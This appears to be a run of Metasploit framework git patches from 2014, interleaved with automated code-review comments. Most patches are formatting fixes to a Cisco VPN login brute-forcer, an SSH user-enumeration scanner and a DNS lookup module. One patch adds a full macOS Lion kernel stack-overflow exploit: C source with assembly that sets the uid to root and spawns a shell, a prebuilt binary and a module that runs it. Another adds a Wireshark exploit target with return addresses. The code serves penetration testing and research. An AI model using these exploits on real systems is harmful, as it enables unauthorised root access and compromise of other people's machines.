::Rex::HostUnreachable, + ::Rex::ConnectionTimeout, + ::Rex::ConnectionError, + ::Errno::EPIPE return end end def enumerate_vpn_groups - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html', + 'method' => 'GET', + ) if res && res.code == 302 - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'method' => 'GET', + ) end groups = Set.new 
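Review bot: `check_conn?` prints "Server is responsive..." without inspecting `res`, and its result is incidental: the success path returns whatever `print_good` returns and the rescue path uses a bare `return`. If `send_request_cgi` can return nil when no response arrives (not shown in this hunk), the method announces a live server that never answered. Making the predicate explicit is a small change: add `return false unless res` before the `print_good`, end the `begin` body with `true`, and use `return false` in the rescue. This matters more now that an earlier hunk changed the `run_host` aborts to `return false`, so callers and helpers agree on boolean results.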
@@ -120,18 +120,18 @@ class Metasploit3 < Msf::Auxiliary # Verify whether we're working with SSL VPN or not def is_app_ssl_vpn? - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html', + 'method' => 'GET', + ) if res && res.code == 302 - res = send_request_cgi({ - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', - 'method' => 'GET', - }) + res = send_request_cgi( + 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'method' => 'GET', + ) end if res && @@ -145,11 +145,11 @@ class Metasploit3 < Msf::Auxiliary end def do_logout(cookie) - res = send_request_cgi({ - 'uri' => '/+webvpn+/webvpn_logout.html', - 'method' => 'GET', - 'cookie' => cookie - }) + res = send_request_cgi( + 'uri' => '/+webvpn+/webvpn_logout.html', + 'method' => 'GET', + 'cookie' => cookie + ) end # Brute-force the login page @@ -175,13 +175,13 @@ class Metasploit3 < Msf::Auxiliary post_params['group_list'] = group unless group.empty? - resp = send_request_cgi({ - 'uri' => '/+webvpn+/index.html', - 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => cookie, - 'vars_post' => post_params - }) + resp = send_request_cgi( + 'uri' => '/+webvpn+/index.html', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'cookie' => cookie, + 'vars_post' => post_params + ) if resp && resp.code == 200 && @@ -210,7 +210,11 @@ class Metasploit3 < Msf::Auxiliary vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, + ::Rex::HostUnreachable, + ::Rex::ConnectionTimeout, + ::Rex::ConnectionError, + ::Errno::EPIPE print_error("#{peer} - HTTP Connection Failed, Aborting") return :abort end From d70aa4cdbbda9faab4c178e9aa55d8f6f95f23ae Mon Sep 17 00:00:00 2001 
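Review bot: In `do_logout` the response is still assigned to `res`, which is never read in the lines shown. Drop the assignment so the call reads as fire-and-forget: `send_request_cgi('uri' => '/+webvpn+/webvpn_logout.html', 'method' => 'GET', 'cookie' => cookie)`. A one-line comment such as `# response intentionally ignored; logout is best-effort` would make that explicit.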
From: Jonathan Claudius Date: Tue, 22 Apr 2014 22:07:25 -0400 Subject: [PATCH 148/853] Fix MSFTidy complaints --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 87cd705d49..9dec6c83a1 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if datastore['GROUP'].empty? print_status("#{peer} - Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups - + if groups.empty? print_good("#{peer} - Unable to enumerate groups") print_good("#{peer} - Using the default group: DefaultWEBVPNGroup") @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary groups << datastore['GROUP'] end groups << "" - + print_status("#{peer} - Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| @@ -100,8 +100,9 @@ class Metasploit3 < Msf::Auxiliary res.code == 302 res = send_request_cgi( - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', + 'vars_get' => { 'fcadbadd' => "1" } ) end @@ -119,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary end # Verify whether we're working with SSL VPN or not - def is_app_ssl_vpn? + def is_app_ssl_vpn? res = send_request_cgi( 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', @@ -129,8 +130,9 @@ class Metasploit3 < Msf::Auxiliary res.code == 302 res = send_request_cgi( - 'uri' => '/+CSCOE+/logon.html?fcadbadd=1', + 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', + 'vars_get' => { 'fcadbadd' => "1" } ) end 
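Review bot: The follow-up request after a 302 is now built identically in `enumerate_vpn_groups` (the `@@ -100,8 +100,9 @@` hunk) and in `is_app_ssl_vpn?` (the `@@ -129,8 +130,9 @@` hunk), including the `'vars_get' => { 'fcadbadd' => "1" }` pair. A small private helper, for example `def get_logon_page`, that performs the initial GET and the conditional second GET would keep the two callers from drifting apart. Both methods start outside their hunks, so the rest of their bodies is not visible here.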
@@ -157,10 +159,10 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin - cookie = "webvpn=; " + - "webvpnc=; " + - "webvpn_portal=; " + - "webvpnSharePoint=; " + + cookie = "webvpn=; " + + "webvpnc=; " + + "webvpn_portal=; " + + "webvpnSharePoint=; " + "webvpnlogin=1; " + "webvpnLang=en;" From 143aede19cc1f4a69c092651d5966005442d9270 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 23 Apr 2014 02:32:42 -0500 Subject: [PATCH 149/853] Add osx nfs_mount module. --- .../osx/nfs_mount_priv_escalation.bin | Bin 0 -> 9356 bytes .../source/osx/nfs_mount_priv_escalation.c | 165 ++++++++++++++++++ modules/exploits/osx/local/nfs_mount_root.rb | 93 ++++++++++ 3 files changed, 258 insertions(+) create mode 100644 data/exploits/osx/nfs_mount_priv_escalation.bin create mode 100644 external/source/osx/nfs_mount_priv_escalation.c create mode 100644 modules/exploits/osx/local/nfs_mount_root.rb 
diff --git a/data/exploits/osx/nfs_mount_priv_escalation.bin b/data/exploits/osx/nfs_mount_priv_escalation.bin new file mode 100644 index 0000000000000000000000000000000000000000..fe182e56932f6ee4f332167d235bf392aef3bf2f GIT binary patch literal 9356 zcmeHNeQX>@6`yn5&55e*Nd$!U0+$0E3RPhEHY7^r(+3mjew9cMWHes5 z9-nXY?R6P@#MdiI*>N@C#8S4eRqfw|u{UCj5LfzFZJYb#90IP?md-t$6}{LGT!&y^ zR8#H~+T~thQ7Y?X2H}?)jyYJ~kFwX|t82Rp_DLW&RH<}Q9wlpn}3h&*tTnXbj!9NpTiRodEs_f$I- zEFl=1FlYy8P$HHPX8@Yk3&B0d{l6A<5|}<5`LqxhK|hAtg~~!5Rz3@_i@B`@c2Th~ ze%&IezqS_SD^T0=Ij1d|=xysil;0{WOQM%bLVO05 z^Pj-_1bdzGTB$|g|1knz6w-T7j-9_K3x~t9m~Zl~jGYKg|7nQ~U6S6}_v_`@bXbnv zC-NVVD?NrFcr&FR;oW+95@j!jliIRS-^_%Og;9x4kaNg8kTVc&DtjZhdn1;dInEC{ z`NYq|(CO}cth1+cf2Zm>*>kdS-6(nl?a3$p%6GRnD+>)9@rOzlZj|26Suc87dijzp zj_)g%%W@`?K(*C9_-gA>S^AG9$dg4q;@_9$Ki`vT>U*e5-=}|rz zn-%%nWbuZ-Yp-WY4WLIu(8r4Y8B`Xu-oUF^Fe85h zX)yBT`H}6f%i=9BX`Q#FcWUBvX==Vx7K?h}iuXJRji1q1@7P8iGfd)CVVt~oqV%P? zC*E250{DU$n{CLi!qZdc=`l#(Z-n5G5p1b=3g)tP&H|P88>MxSmcl`o%jxVgT}_Y% z)A=3zD*chpO*71!cSA>q_&vxlX2^_rhk8HIdWcTGOBSLfS%`!;y{=d1QK}U;cWdoq zYyD~ND2$VvczO-m9o`A7YFPJ7qler##@SQi&Yg+Ai&hk(?|RYmh3I)C!y2wQlA*A7 zR^E5k8?T3MzOkSwa*9dQbF#z?n=Ch9!jsF*mv#GrZfA9SMYkX7_Ns0to9<1HEEnB(^;m8yn~tS4n;Pm*I9j>Sv16{?Z{@PdOv1IYF*n|v zTQ1TAInn*O9?QAIbHajI>rf`|SO@JSzIW~Qa2qacaWdH~9f(;u{E|zy ziniWFx-AzMclGJ7(c2LQmP(2h(!VzE24&?hMHcc{One#EiJQ&0Q3MzTSrC+)4HJ5N zw+M|ig_>3@3s0i|PRRL`@D&6dWm_Vn<0<{R#B2bG!EdsR&)FM!eKrI5-kHD%8V($a{arYNd zyb6!?4XM8PkQ&U#oPP0;(=i$0C6>M@yy;owqqP}HU3dIEXZ#$|tuaoMV`oN?Y|izE+&mWYe1(Tw6~r>;-*42#|+ zVro4kN7)=_b9#NSIu}<*y2x|jN*s_(;UbdfB)q3w$%{#I4zn6;BZR?u&8-Fp=QbM* z4$f^_ftQ3Z7=`xkN9Fk7d}li`J8=C-@{qy7z276ikh4pd186HT4-+f#m#gqoRru*D z{7e;ot_r_gg{P|UD^-}s+?D?D7NHXVstUhVg?Y+csgGq~X!JVZs7l}A^YE1s<$XEV z<0e#|-`#@xanv=a`c6ZL2=7JzTN{>8PJ6qnu%T2|{~LqS`>;>=bQrhv^LtLI#amJZ z8&>IU?C)y~^3xTJpECZ}HPLr1=A%jeWYdQs0mbqt=F37e; IZxzJp-zo3FDgXcg literal 0 HcmV?d00001 
diff --git a/external/source/osx/nfs_mount_priv_escalation.c b/external/source/osx/nfs_mount_priv_escalation.c new file mode 100644 index 0000000000..86098b5a44 --- /dev/null +++ b/external/source/osx/nfs_mount_priv_escalation.c 
@@ -0,0 +1,165 @@ +/* + * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit + * CVE None + * by Kenzley Alphonse + * + * + * Notes: + * This exploit leverage a stack overflow vulnerability to escalate privileges. + * The vulnerable function nfs_convert_old_nfs_args does not verify the size + * of a user-provided argument before copying it to the stack. As a result by + * passing a large size, a local user can overwrite the stack with arbitrary + * content. + * + * Tested on Max OS X Lion xnu-1699.22.73 (x86_64) + * Tested on Max OS X Lion xnu-1699.32.7 (x86_64) + * + * Greets to taviso, spender, joberheide + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/** change these to fit your environment if needed **/ +#define SSIZE (536) + +/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/ +struct user_nfs_args { + int version; /* args structure version number */ + char* addr __attribute__((aligned(8))); /* file server address */ + int addrlen; /* length of address */ + int sotype; /* Socket type */ + int proto; /* and Protocol */ + char * fh __attribute__((aligned(8))); /* File handle to be mounted */ + int fhsize; /* Size, in bytes, of fh */ + int flags; /* flags */ + int wsize; /* write size in bytes */ + int rsize; /* read size in bytes */ + int readdirsize; /* readdir size in bytes */ + int timeo; /* initial timeout in .1 secs */ + int retrans; /* times to retry send */ + int maxgrouplist; /* Max. 
size of group list */ + int readahead; /* # of blocks to readahead */ + int leaseterm; /* obsolete: Term (sec) of lease */ + int deadthresh; /* obsolete: Retrans threshold */ + char* hostname __attribute__((aligned(8))); /* server's name */ + /* NFS_ARGSVERSION 3 ends here */ + int acregmin; /* reg file min attr cache timeout */ + int acregmax; /* reg file max attr cache timeout */ + int acdirmin; /* dir min attr cache timeout */ + int acdirmax; /* dir max attr cache timeout */ + /* NFS_ARGSVERSION 4 ends here */ + uint auth; /* security mechanism flavor */ + /* NFS_ARGSVERSION 5 ends here */ + uint deadtimeout; /* secs until unresponsive mount considered dead */ +}; + +/** sets the uid for the current process and safely exits from the kernel**/ +static void r00t_me() { + asm( + // padding + "nop; nop; nop; nop;" + + // task_t %rax = current_task() + "movq %%gs:0x00000008, %%rax;" + "movq 0x00000348(%%rax), %%rax;" + + // proc %rax = get_bsdtask_info() + "movq 0x000002d8(%%rax),%%rax;" + + // ucred location at proc + "movq 0x000000d0(%%rax),%%rax;" + + // uid = 0 + "xorl %%edi, %%edi;" + "movl %%edi, 0x0000001c(%%rax);" + "movl %%edi, 0x00000020(%%rax);" + + // fix the stack pointer and return (EACCES) + "movq $13, %%rax;" + "addq $0x00000308,%%rsp;" + "popq %%rbx;" + "popq %%r12;" + "popq %%r13;" + "popq %%r14;" + "popq %%r15;" + "popq %%rbp;" + "ret;" + :::"%rax" + ); +} + +int main(int argc, char ** argv) { + struct user_nfs_args xdrbuf; + char * path; + char obuf[SSIZE]; + + + /** clear the arguments **/ + memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args)); + memset(obuf, 0x00, SSIZE); + + /** set up variable to get path to vulnerable code **/ + xdrbuf.version = 3; + xdrbuf.hostname = "localhost"; + xdrbuf.addrlen = SSIZE; + xdrbuf.addr = obuf; + + /** set ret address **/ + *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5); + printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]); + + /** create a unique tmp name **/ + if ((path = 
tmpnam(NULL)) == NULL) { + // path can be any directory which we have read/write/exec access + // but I'd much rather create one instead of searching for one + perror("[-] tmpnam"); + exit(EXIT_FAILURE); + } + + /** make the path in tmp so that we can use it **/ + if (mkdir(path, 0660) < 0) { + perror("[-] mkdir"); + exit(EXIT_FAILURE); + } + + /** inform the user that the path was created **/ + printf("[*] created sploit path%s\n", path); + + /** call the vulnerable function **/ + if (mount("nfs", path, 0, &xdrbuf) < 0) { + if (errno == EACCES) { + puts("[+] escalating privileges..."); + } else { + perror("[-] mount"); + } + + } + + /** clean up tmp dir **/ + if (rmdir(path) < 0) { + perror("[-] rmdir"); + } + + /** check if privs are equal to root **/ + if (getuid() != 0) { + puts("[-] priviledge escalation failed"); + exit(EXIT_FAILURE); + } + + /** get root shell **/ + printf("[+] We are now uid=%i ... your welcome!\n", getuid()); + printf("[+] Dropping a shell.\n"); + + /** execute **/ + execl("/bin/sh", "/bin/sh", "-c", argv[1], NULL); + return 0; +} diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb new file mode 100644 index 0000000000..7ab4242f50 --- /dev/null +++ b/modules/exploits/osx/local/nfs_mount_root.rb 
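Review bot: This source file is committed together with a prebuilt `data/exploits/osx/nfs_mount_priv_escalation.bin`, but nothing in the header comment records how the binary was produced, so a reviewer cannot confirm that the shipped blob corresponds to this code. Add a header line such as `* Build: <compiler, flags and SDK used to produce nfs_mount_priv_escalation.bin>` and, ideally, a checksum of the resulting file. The header also reads "Max OS X" twice where "Mac OS X" is meant.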
@@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit', + 'Description' => %q{ + This exploit leverage a stack overflow vulnerability to escalate privileges. + The vulnerable function nfs_convert_old_nfs_args does not verify the size + of a user-provided argument before copying it to the stack. As a result by + passing a large size, a local user can overwrite the stack with arbitrary + content. + + Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Kenzley Alphonse', # discovery and a very well-written exploit + 'joev' # msf module + ], + 'References' => + [ + [ 'EDB', '32813' ] + ], + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86_64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.7 Lion x64 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64 + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 11 2014' + )) + end + + def check + if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8" + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx') + file = File.join(osx_path, 'nfs_mount_priv_escalation.bin') + exploit = File.read(file) + pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) + tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + + print_status "Writing temp file... 
#{tmpfile}" + write_file(tmpfile, exploit) + register_file_for_cleanup(tmpfile) + + print_status "Writing payload file... #{payloadfile}" + write_file(payloadfile, pload) + register_file_for_cleanup(payloadfile) + + print_status "Executing payload..." + cmd_exec("chmod +x #{tmpfile}") + cmd_exec("chmod +x #{payloadfile}") + cmd_exec("#{tmpfile} #{payloadfile}") + end + + def xnu_ver + m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/) + m && m[1] + end + + def ver_lt(a, b) + Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,'')) + end + +end From 457c48b89b9c2c9deffb18db632703a2764a01ef Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Wed, 23 Apr 2014 11:38:23 +0200 Subject: [PATCH 150/853] Error on sleep --- modules/auxiliary/gather/dns_reverse_lookup.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 129da312d8..2764c0b336 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary # Basic Throttling sleep_time = 0.0 if (datastore['THROTTLE'] != 0) - sleep_time = (1.0/datastore['THROTTLE'])/datastore['THREADS'] + sleep_time = (1.0/datastore['THROTTLE'])*datastore['THREADS'] print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") end # Output.. From 1a2899d57b8d0017dcc81124b09531b5891756ba Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 23 Apr 2014 10:00:34 -0500 Subject: [PATCH 151/853] Fix up whitespace 'n' stuff --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 62 +++++++------------ 1 file changed, 24 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index e5ff043108..5a08c128e2 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
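Review bot: `check` uses `ver_lt(xnu_ver, "1699.32.7")`, a strict less-than, while the module description says kernels `<= xnu-1699.32.7` are affected, so a host on exactly that build is reported as Safe. `xnu_ver` also returns nil when `uname -a` does not match the pattern, and `ver_lt` then calls `gsub` on nil. Returning `Exploit::CheckCode::Unknown` for a nil version would avoid the NoMethodError and the misleading verdict. `xnu_ver` is invoked twice in the condition, which runs the command twice; assign it once at the top of `check`.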
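Review bot: The throttle guard `datastore['THROTTLE'] != 0` lets a negative value through, which makes `sleep_time` negative. How `sleep_time` is consumed is outside the hunk, but a negative argument to `sleep` raises ArgumentError; `if datastore['THROTTLE'] > 0` would cover both cases. The status string "queries per seconds" should read "queries per second".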
@@ -12,50 +12,47 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - def initialize - super( + def initialize(info = {}) + super(update_info(info 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. }, 'Author' => ['kenkeiras'], 'References' => - [ - ['CVE', '2006-5229'] - ], + [ + ['CVE', '2006-5229'] + ], 'License' => MSF_LICENSE - ) + )) register_options( [ + Opt::RPORT(22), OptPath.new('USER_FILE', - [true, 'File containing usernames, one per line', nil]), + [true, 'File containing usernames, one per line', nil]), OptInt.new('THRESHOLD', - [true, - 'Amount of seconds needed before a user is considered ' \ - 'found', 10]), - Opt::RPORT(22) + [true, + 'Amount of seconds needed before a user is considered ' \ + 'found', 10]) ], self.class ) register_advanced_options( [ - OptBool.new('SSH_DEBUG', - [false, 'Enable SSH debugging output (Extreme verbosity!)', - false]), - - OptInt.new('SSH_TIMEOUT', - [false, 'Specify the maximum time to negotiate a SSH session', - 10]), - OptInt.new('RETRY_NUM', [true , 'The number of attempts to connect to a SSH server' \ - ' for each user', 3]) + ' for each user', 3]), + OptInt.new('SSH_TIMEOUT', + [false, 'Specify the maximum time to negotiate a SSH session', + 10]), + OptBool.new('SSH_DEBUG', + [false, 'Enable SSH debugging output (Extreme verbosity!)', + false]) ] ) end - def rport datastore['RPORT'] end @@ -90,16 +87,12 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse return :connection_error - rescue Net::SSH::Disconnect, ::EOFError return :success - rescue ::Timeout::Error return :success - rescue Net::SSH::Exception end 
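Review bot: The rewritten constructor call `super(update_info(info 'Name' => ...` lacks the comma after `info`, so the file no longer parses. It should read `super(update_info(info,`. Running `ruby -c` on the module before committing would catch this kind of slip in a whitespace-only cleanup.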
@@ -112,29 +105,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_report(ip, user, port) report_auth_info( - :host => ip, - :port => rport, - :sname => 'ssh', - :user => user, + :host => ip, + :port => rport, + :sname => 'ssh', + :user => user, :active => true ) end - def user_list File.new(datastore['USER_FILE']).read.split end - def attempt_user(user, ip) attempt_num = 0 ret = nil while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) - if attempt_num > 0 Rex.sleep(2 ** attempt_num) print_debug "Retrying '#{user}' on '#{ip}' due to connection error" @@ -143,28 +132,25 @@ class Metasploit3 < Msf::Auxiliary ret = check_user(ip, user, rport) attempt_num += 1 end + ret end - def show_result(attempt_result, user, ip) case attempt_result when :success print_good "User '#{user}' found on #{ip}" do_report(ip, user, rport) - when :connection_error print_error "User '#{user}' on #{ip} could not connect" - when :fail print_debug "User '#{user}' not found on #{ip}" - end end - def run_host(ip) print_status "Starting scan on #{ip}" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end + end From 0a108acea3fdfcb473bafc639282275b5050b8f9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 23 Apr 2014 10:08:37 -0500 Subject: [PATCH 152/853] Fix missing comma Commas will be the death of me. --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 5a08c128e2..834494d700 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::CommandShell def initialize(info = {}) - super(update_info(info + super(update_info(info, 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. From fd95d9ef382cdd53940ab7696047881f53b9ac70 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Wed, 23 Apr 2014 17:32:56 +0100 Subject: [PATCH 153/853] Added english windows xp sp2 target --- .../exploits/windows/misc/wireshark_mpeg_overflow.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 934449dbb8..16f1f81771 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -53,10 +53,18 @@ class Metasploit3 < Msf::Exploit::Remote 'jmpesp' => 0x68e2bfb9, } ], + [ 'WinXP SP2 English (bypass DEP)', + { + 'OffSet2' => 70692, + 'OffSet' => 70476, + 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'jmpesp' => 0x68e2bfb9, + } + ], ], 'Privileged' => false, 'DisclosureDate' => 'Mar 20 2014', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 1)) register_options( [ From e2b92a824f531503b9e52f7a5368e949ffccead8 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 23 Apr 2014 18:56:27 -0400 Subject: [PATCH 154/853] Change white space for authors in dns_reverse_lookup --- modules/auxiliary/gather/dns_reverse_lookup.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 2764c0b336..b472ae5b10 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
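Review bot: Besides adding the new entry to 'Targets', the `@@ -53,10 +53,18 @@` hunk changes 'DefaultTarget' from 0 to 1, which the commit subject does not mention and which changes behaviour for anyone relying on the previous default. If that is intended, say so in the commit message; otherwise keep `'DefaultTarget' => 0`. The 'Targets' array starts outside the hunk.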
@@ -17,8 +17,11 @@ class Metasploit3 < Msf::Auxiliary This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names. }, - 'Author' => [ 'Carlos Perez ', # Base code - 'Thanat0s '], # Output, Throttling & Db notes add + 'Author' => + [ + 'Carlos Perez ', # Base code + 'Thanat0s ' # Output, Throttling & Db notes add + ], 'License' => BSD_LICENSE )) From ec1f7d644cda80d99ec9ae94675d8f9a9ea96a1c Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 23 Apr 2014 23:03:02 -0400 Subject: [PATCH 155/853] Support deprecation information from constants --- lib/msf/core/module/deprecated.rb | 33 ++++++++++++++++--- .../stagers/windows/reverse_ipv6_http.rb | 6 +++- .../stagers/windows/reverse_ipv6_https.rb | 6 ++++ 3 files changed, 40 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2dee7bfddd..90cd666a3e 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb 
@@ -33,18 +33,34 @@ module Msf::Module::Deprecated end # (see ClassMethods#replacement_module) - def replacement_module; self.class.replacement_module; end + def replacement_module + if self.class.instance_variable_defined?(:@replacement_module) + return self.class.replacement_module + elsif self.class.const_defined?(:DEPRECATION_REPLACEMENT) + return self.class.const_get(:DEPRECATION_REPLACEMENT) + end + end + # (see ClassMethods#deprecation_date) - def deprecation_date; self.class.deprecation_date; end + def deprecation_date + if self.class.instance_variable_defined?(:@deprecation_date) + return self.class.deprecation_date + elsif self.class.const_defined?(:DEPRECATION_DATE) + return self.class.const_get(:DEPRECATION_DATE) + end + end # Extends with {ClassMethods} def self.included(base) base.extend(ClassMethods) end - def setup + # Print the module deprecation information + # + # @return [void] + def print_deprecation_warning print_warning("*"*72) - print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*") + print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") if deprecation_date print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") end @@ -52,6 +68,15 @@ module Msf::Module::Deprecated print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") end print_warning("*"*72) + end + + def generate + print_deprecation_warning + super + end + + def setup + print_deprecation_warning super end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb index d4dd790a69..1a1afd3dfa 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb 
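Review bot: `replacement_module` and `deprecation_date` now fall through to an implicit nil when neither the class-level value nor the constant is defined, and the inherited `(see ClassMethods#...)` doc lines do not say so. Add `# @return [String, nil] nil when no replacement is declared` (and the matching line for the date) so it is clear that `print_deprecation_warning` relies on the nil case. The two methods also repeat the same ivar-or-constant lookup and could share one private helper, and the explicit `return`s are unnecessary.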
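Review bot: With the new `generate` override the banner is printed from both `generate` and `setup`, so a module on which both are invoked shows the deprecation warning twice; whether that happens depends on callers outside the hunk. The override is also added to every class that includes the mixin, and its `super` would raise NoMethodError where no ancestor defines `generate`, so a comment stating that it exists for payload modules would help. A once-only guard at the top of `print_deprecation_warning`, `return if @deprecation_warned` followed by `@deprecation_warned = true`, avoids the repeat.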
